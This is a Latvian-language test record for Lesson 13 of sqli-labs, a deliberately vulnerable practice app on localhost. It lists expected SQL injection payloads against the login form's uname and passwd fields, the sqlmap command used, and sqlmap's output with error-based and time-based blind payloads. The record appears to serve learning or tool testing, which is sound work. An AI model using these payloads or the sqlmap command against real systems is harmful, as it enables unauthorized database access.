=================================================================================
1. Īpašība: tiek atgriezta tikai true/false boolean vērtība - "login attempt failed" vai "successfully logged in"
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: uname=test') or 1=1-- -&passwd=test
3.2. error-based: uname=test')&passwd=test
3.3. time-based: uname=test') or sleep(1)-- -&passwd=test
3.4. union: uname=test') union select 1,2-- -&passwd=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 872671 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-13/" -p uname,passwd --data="uname=test&passwd=test" -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
7.3. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
7.4. POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.5. POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
7.6. there were multiple injection points, please select the one to use for following injections: 0 (0 nozīmē = parameter: username)
=================================================================================
sqlmap identified the following injection point(s) with a total of 3641 HTTP(s) requests:
---
Parameter: passwd (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test&passwd=test') AND GTID_SUBSET(CONCAT(0x7162707871,(SELECT (ELT(5286=5286,1))),0x716b7a6a71),5286)-- eQOX

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test&passwd=test') AND (SELECT 1257 FROM (SELECT(SLEEP(5)))DGmN)-- qFXg

Parameter: uname (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test') AND GTID_SUBSET(CONCAT(0x7162707871,(SELECT (ELT(5809=5809,1))),0x716b7a6a71),5809)-- uRei&passwd=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test') AND (SELECT 3848 FROM (SELECT(SLEEP(5)))pLDv)-- VpVK&passwd=test
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
